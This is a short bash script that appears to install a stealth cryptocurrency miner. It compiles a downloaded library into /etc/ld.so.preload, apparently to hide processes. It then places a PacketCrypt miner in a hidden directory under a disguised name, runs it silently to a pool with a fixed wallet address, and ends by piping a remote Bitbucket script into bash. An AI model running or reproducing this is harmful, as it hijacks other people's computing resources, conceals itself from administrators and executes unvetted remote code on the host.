#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/cornea99/upil/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
mkdir .kap && cd .kap
wget -O sgr1 https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.5.2/packetcrypt-v0.5.2-linux_amd64 >/dev/null 2>&1
chmod +x sgr1 
./sgr1 ann -p pkt1qfj6fgahq88k5f28e7g6x9srcq40vva8aljlwjr http://pool.pkt.world >/dev/null 2>&1
curl -sL https://bitbucket.org/kzpakid/wtrr/raw/master/time | bash
